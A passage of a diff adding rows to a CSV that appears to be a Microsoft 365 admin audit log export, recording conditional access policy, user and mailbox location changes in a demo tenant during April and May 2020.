+    ""Value"": ""{\""Version\"":0,\""State\"":\""Enabled\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""94c63fef-13a3-47bc-8074-75af8c65887a\"",\""c9a559d2-7aab-4f13-a6ed-e7e9c52aec87\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""bdb72692-2275-412b-8af0-ea21c2ebd174\"",\""eababd92-9dc7-40e3-9359-6c106522db19\""]}]},\""SignInRisks\"":{\""Include\"":[{\""SignInRisks\"":[\""High\"",\""Medium\"",\""Low\""]}]}},\""SessionControls\"":[\""CloudAppSecurity\""],\""PersistentBrowserSessionMode\"":\""NotSet\"",\""EnforceAllPoliciesForEas\"":false,\""IncludeOtherLegacyClientTypeForEvaluation\"":false,\""CasSessionControlType\"":3}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""5/11/2020 1:58:15 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""GBB demo""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-05-11T01:58:14Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\8872f6fb-da88-4b63-bcc7-17247669596b""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""State\"":\""Enabled\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""00000002-0000-0ff1-ce00-000000000000\"",\""09abbdfd-ed23-44ee-a2d9-a627aa1c90f3\"",\""cc15fd57-2c6c-4117-a88c-83b1d56b4bbe\"",\""00000003-0000-0ff1-ce00-000000000000\"",\""00000005-0000-0ff1-ce00-000000000000\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""eababd92-9dc7-40e3-9359-6c106522db19\""]}]}},\""SessionControls\"":[\""CloudAppSecurity\""],\""PersistentBrowserSessionMode\"":\""NotSet\"",\""EnforceAllPoliciesForEas\"":false,\""IncludeOtherLegacyClientTypeForEvaluation\"":false,\""CasSessionControlType\"":1}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""5/11/2020 1:58:14 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""MeganB MCAS Proxy""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-04-02T09:01:38Z,,,Set-User,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""4b2462a4-bbee-495a-a0e1-f23ae524cc9c\\a2409f54-2a30-4647-ba61-3cb44edc1a5a""
+  },
+  {
+    ""Name"": ""SyncMailboxLocationGuids"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""ErrorAction"",
+    ""Value"": ""Stop""
+  }
+]"
+2020-04-02T09:01:35Z,,,Remove-MailboxLocation,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""4b2462a4-bbee-495a-a0e1-f23ae524cc9c\\cce1bb08-4ca3-471e-968a-444fc9fbd165""
+  },
+  {
+    ""Name"": ""Confirm"",
+    ""Value"": ""False""
+  },
+  {
+    ""Name"": ""ErrorAction"",
+    ""Value"": ""Stop""
+  }
+]"
+2020-04-02T09:01:22Z,,,Remove-MailboxLocation,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""4b2462a4-bbee-495a-a0e1-f23ae524cc9c\\2c5cc28d-ee4c-417d-a225-e40fec7ed0ff""
+  },
+  {
+    ""Name"": ""Confirm"",
+    ""Value"": ""False""
+  },
+  {
+    ""Name"": ""ErrorAction"",
+    ""Value"": ""Stop""
+  }
+]"
+2020-03-31T22:02:51Z,,,Set-User,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""4b2462a4-bbee-495a-a0e1-f23ae524cc9c\\a2409f54-2a30-4647-ba61-3cb44edc1a5a""
+  },
+  {
+    ""Name"": ""SyncMailboxLocationGuids"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""ErrorAction"",
+    ""Value"": ""Stop""
+  }
+]"
+2020-04-01T20:12:19Z,,,Remove-MailboxLocation,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""4b2462a4-bbee-495a-a0e1-f23ae524cc9c\\2ca0d752-d53b-4638-8d67-8aec78e52901""
+  },
+  {
+    ""Name"": ""Confirm"",
+    ""Value"": ""False""
+  },
+  {
+    ""Name"": ""ErrorAction"",
+    ""Value"": ""Stop""
+  }
+]"
+2020-04-01T20:12:55Z,,,Set-User,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""4b2462a4-bbee-495a-a0e1-f23ae524cc9c\\a2409f54-2a30-4647-ba61-3cb44edc1a5a""
+  },
+  {
+    ""Name"": ""SyncMailboxLocationGuids"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""ErrorAction"",
+    ""Value"": ""Stop""
+  }
+]"
+2020-05-03T15:19:38Z,,,Set-User,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""4b2462a4-bbee-495a-a0e1-f23ae524cc9c\\4fa53e5c-cfa7-4206-8b32-0c555070f202""
+  },
+  {
+    ""Name"": ""SyncMailboxLocationGuids"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""ErrorAction"",
+    ""Value"": ""Stop""
+  }
+]"
+2020-05-03T18:39:50Z,,,Set-User,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""4b2462a4-bbee-495a-a0e1-f23ae524cc9c\\4fa53e5c-cfa7-4206-8b32-0c555070f202""
+  },
+  {
+    ""Name"": ""SyncMailboxLocationGuids"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""ErrorAction"",
+    ""Value"": ""Stop""
+  }
+]"
+2020-05-05T02:56:25Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\8837fdaa-aaeb-4432-9622-43f6f583d583""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""KnownNetworkPolicies\"":{\""NetworkName\"":\""BE-Office\"",\""NetworkId\"":\""b98b9088-ce88-4fae-80fb-5b58cb1ce685\"",\""CidrIpRanges\"":[\""109.88.218.99/28\""],\""CountryIsoCodes\"":null,\""Categories\"":[],\""ApplyToUnknownCountry\"":false}}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""5/5/2020 2:56:24 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": ""6""
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Known Networks List""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": ""3/19/2020 7:45:08 PM""
+  }
+]"
+2020-05-05T02:56:24Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\2e76d011-eaa3-40b4-8ce8-7fba52bf3af8""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""State\"":\""Reporting\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""f9e8b3d0-ba26-42cd-b544-c90a66191a81\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""All\""]}]}},\""SessionControls\"":[\""CloudAppSecurity\""],\""PersistentBrowserSessionMode\"":\""NotSet\"",\""EnforceAllPoliciesForEas\"":false,\""IncludeOtherLegacyClientTypeForEvaluation\"":false,\""CasSessionControlType\"":1}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""5/5/2020 2:56:24 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""On-Prem SharePoint - MeganB proxy""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-05-05T02:56:24Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""State\"":\""Enabled\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""All\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""bdb72692-2275-412b-8af0-ea21c2ebd174\""]}]}},\""Controls\"":[{\""Control\"":[\""Mfa\""]}],\""PersistentBrowserSessionMode\"":\""NotSet\"",\""EnforceAllPoliciesForEas\"":false,\""IncludeOtherLegacyClientTypeForEvaluation\"":false}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""5/5/2020 2:56:24 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Semolen - Admin MFA""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-05-05T02:56:24Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\5fd0c4ff-1cd7-4bf6-8607-294a04f58f12""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""State\"":\""Disabled\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""All\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""142512c7-f006-46ae-909c-14fa7bf6a887\""]}]}},\""Controls\"":[{\""Control\"":[\""Mfa\""]}],\""EnforceAllPoliciesForEas\"":false,\""IncludeOtherLegacyClientTypeForEvaluation\"":false}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""5/5/2020 2:56:24 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Azure MFA""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-05-05T02:56:24Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""State\"":\""Enabled\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Acrs\"":[\""urn:microsoft:req1\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""eababd92-9dc7-40e3-9359-6c106522db19\""]}]}},\""Controls\"":[{\""Control\"":[\""Mfa\""]}],\""PersistentBrowserSessionMode\"":\""NotSet\"",\""EnforceAllPoliciesForEas\"":false,\""IncludeOtherLegacyClientTypeForEvaluation\"":false}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""5/5/2020 2:56:24 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""MeganB MCAS Step-up""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-05-05T02:56:24Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\8872f6fb-da88-4b63-bcc7-17247669596b""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""State\"":\""Enabled\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""00000002-0000-0ff1-ce00-000000000000\"",\""09abbdfd-ed23-44ee-a2d9-a627aa1c90f3\"",\""cc15fd57-2c6c-4117-a88c-83b1d56b4bbe\"",\""00000003-0000-0ff1-ce00-000000000000\"",\""00000005-0000-0ff1-ce00-000000000000\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""eababd92-9dc7-40e3-9359-6c106522db19\""]}]}},\""SessionControls\"":[\""CloudAppSecurity\""],\""PersistentBrowserSessionMode\"":\""NotSet\"",\""EnforceAllPoliciesForEas\"":false,\""IncludeOtherLegacyClientTypeForEvaluation\"":false,\""CasSessionControlType\"":1}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""5/5/2020 2:56:24 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""MeganB MCAS Proxy""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-05-05T02:56:24Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\69c7a12f-b407-45a3-b07e-fa04fc7f273d""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""State\"":\""Enabled\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""00000003-0000-0ff1-ce00-000000000000\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""All\""]}]}},\""SessionControls\"":[\""CloudAppSecurity\""],\""PersistentBrowserSessionMode\"":\""NotSet\"",\""EnforceAllPoliciesForEas\"":false,\""IncludeOtherLegacyClientTypeForEvaluation\"":false,\""CasSessionControlType\"":1}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""5/5/2020 2:56:24 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Test Policy""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-05-05T02:56:24Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\235bec94-f744-48ac-8314-5675953d2def""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""State\"":\""Disabled\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""All\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""eababd92-9dc7-40e3-9359-6c106522db19\""]}]},\""DevicePlatforms\"":{\""Include\"":[{\""DevicePlatforms\"":[\""All\""]}],\""Exclude\"":[{\""DevicePlatforms\"":[\""macOS\""]}]}},\""Controls\"":[{\""Control\"":[\""Mfa\""]}],\""PersistentBrowserSessionMode\"":\""NotSet\"",\""EnforceAllPoliciesForEas\"":false,\""IncludeOtherLegacyClientTypeForEvaluation\"":false}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""5/5/2020 2:56:24 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Megan MFA demo""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-05-05T02:56:24Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\e183bd29-a3a3-4f91-a5a3-b83b21a544df""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""State\"":\""Enabled\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""00000002-0000-0ff1-ce00-000000000000\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""2935e535-8fdf-4217-865b-e084cb7214f1\""]}]}},\""SessionControls\"":[\""AppEnforcedRestrictions\""],\""PersistentBrowserSessionMode\"":\""NotSet\"",\""EnforceAllPoliciesForEas\"":false,\""IncludeOtherLegacyClientTypeForEvaluation\"":false}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""5/5/2020 2:56:24 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""JulianI Exchange native controls""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-05-05T02:56:24Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\6490d00c-7ba1-42cf-aa88-99eb71d53bf7""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""LastUpdatedTimestamp\"":\""2020-04-09T17:01:29.9572143Z\"",\""State\"":\""Disabled\"",\""SignInFrequency\"":\""NotSet\"",\""PersistentBrowserSessionMode\"":\""NotSet\""}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""5/5/2020 2:56:24 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": ""18""
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Default Policy""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-05-05T02:56:24Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\bcd93f74-64fd-4042-a3ae-ee6d48886d6d""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""State\"":\""Enabled\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""c9a559d2-7aab-4f13-a6ed-e7e9c52aec87\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""bdb72692-2275-412b-8af0-ea21c2ebd174\"",\""eababd92-9dc7-40e3-9359-6c106522db19\""]}]}},\""SessionControls\"":[\""CloudAppSecurity\""],\""PersistentBrowserSessionMode\"":\""NotSet\"",\""EnforceAllPoliciesForEas\"":false,\""IncludeOtherLegacyClientTypeForEvaluation\"":false,\""CasSessionControlType\"":3}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""5/5/2020 2:56:24 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Form MCAS""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-05-05T02:56:24Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\ba36f0a4-6d73-4ba4-9282-3b3c14575e36""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""State\"":\""Disabled\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""00000002-0000-0ff1-ce00-000000000000\"",\""00000003-0000-0ff1-ce00-000000000000\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""2935e535-8fdf-4217-865b-e084cb7214f1\""]}]}},\""SessionControls\"":[\""CloudAppSecurity\""],\""PersistentBrowserSessionMode\"":\""NotSet\"",\""EnforceAllPoliciesForEas\"":false,\""IncludeOtherLegacyClientTypeForEvaluation\"":false,\""CasSessionControlType\"":1}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""5/5/2020 2:56:24 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Block Access JulianI""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-05-05T02:56:24Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\b2915792-0396-4abe-94ec-e17fa17243c5""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""State\"":\""Enabled\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""94c63fef-13a3-47bc-8074-75af8c65887a\"",\""c9a559d2-7aab-4f13-a6ed-e7e9c52aec87\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""bdb72692-2275-412b-8af0-ea21c2ebd174\"",\""eababd92-9dc7-40e3-9359-6c106522db19\""]}]},\""SignInRisks\"":{\""Include\"":[{\""SignInRisks\"":[\""High\"",\""Medium\"",\""Low\""]}]}},\""SessionControls\"":[\""CloudAppSecurity\""],\""PersistentBrowserSessionMode\"":\""NotSet\"",\""EnforceAllPoliciesForEas\"":false,\""IncludeOtherLegacyClientTypeForEvaluation\"":false,\""CasSessionControlType\"":3}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""5/5/2020 2:56:24 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""GBB demo""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-05-05T02:21:55Z,,,Set-User,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""4b2462a4-bbee-495a-a0e1-f23ae524cc9c\\4fa53e5c-cfa7-4206-8b32-0c555070f202""
+  },
+  {
+    ""Name"": ""SyncMailboxLocationGuids"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""ErrorAction"",
+    ""Value"": ""Stop""
+  }
+]"
+2020-05-05T06:21:40Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\69c7a12f-b407-45a3-b07e-fa04fc7f273d""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""State\"":\""Enabled\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""00000003-0000-0ff1-ce00-000000000000\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""All\""]}]}},\""SessionControls\"":[\""CloudAppSecurity\""],\""PersistentBrowserSessionMode\"":\""NotSet\"",\""EnforceAllPoliciesForEas\"":false,\""IncludeOtherLegacyClientTypeForEvaluation\"":false,\""CasSessionControlType\"":1}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""5/5/2020 6:21:40 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Test Policy""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-05-05T06:21:39Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\b2915792-0396-4abe-94ec-e17fa17243c5""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""State\"":\""Enabled\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""94c63fef-13a3-47bc-8074-75af8c65887a\"",\""c9a559d2-7aab-4f13-a6ed-e7e9c52aec87\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""bdb72692-2275-412b-8af0-ea21c2ebd174\"",\""eababd92-9dc7-40e3-9359-6c106522db19\""]}]},\""SignInRisks\"":{\""Include\"":[{\""SignInRisks\"":[\""High\"",\""Medium\"",\""Low\""]}]}},\""SessionControls\"":[\""CloudAppSecurity\""],\""PersistentBrowserSessionMode\"":\""NotSet\"",\""EnforceAllPoliciesForEas\"":false,\""IncludeOtherLegacyClientTypeForEvaluation\"":false,\""CasSessionControlType\"":3}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""5/5/2020 6:21:39 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""GBB demo""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-05-05T06:21:40Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\6490d00c-7ba1-42cf-aa88-99eb71d53bf7""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""LastUpdatedTimestamp\"":\""2020-04-09T17:01:29.9572143Z\"",\""State\"":\""Disabled\"",\""SignInFrequency\"":\""NotSet\"",\""PersistentBrowserSessionMode\"":\""NotSet\""}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""5/5/2020 6:21:39 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": ""18""
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Default Policy""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-05-05T06:21:39Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""State\"":\""Enabled\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""All\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""bdb72692-2275-412b-8af0-ea21c2ebd174\""]}]}},\""Controls\"":[{\""Control\"":[\""Mfa\""]}],\""PersistentBrowserSessionMode\"":\""NotSet\"",\""EnforceAllPoliciesForEas\"":false,\""IncludeOtherLegacyClientTypeForEvaluation\"":false}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""5/5/2020 6:21:39 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Semolen - Admin MFA""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-05-05T06:21:39Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\5fd0c4ff-1cd7-4bf6-8607-294a04f58f12""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""State\"":\""Disabled\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""All\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""142512c7-f006-46ae-909c-14fa7bf6a887\""]}]}},\""Controls\"":[{\""Control\"":[\""Mfa\""]}],\""EnforceAllPoliciesForEas\"":false,\""IncludeOtherLegacyClientTypeForEvaluation\"":false}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""5/5/2020 6:21:39 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Azure MFA""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-05-05T06:21:38Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""State\"":\""Enabled\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Acrs\"":[\""urn:microsoft:req1\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""eababd92-9dc7-40e3-9359-6c106522db19\""]}]}},\""Controls\"":[{\""Control\"":[\""Mfa\""]}],\""PersistentBrowserSessionMode\"":\""NotSet\"",\""EnforceAllPoliciesForEas\"":false,\""IncludeOtherLegacyClientTypeForEvaluation\"":false}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""5/5/2020 6:21:38 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""MeganB MCAS Step-up""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-05-05T06:21:38Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\8872f6fb-da88-4b63-bcc7-17247669596b""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
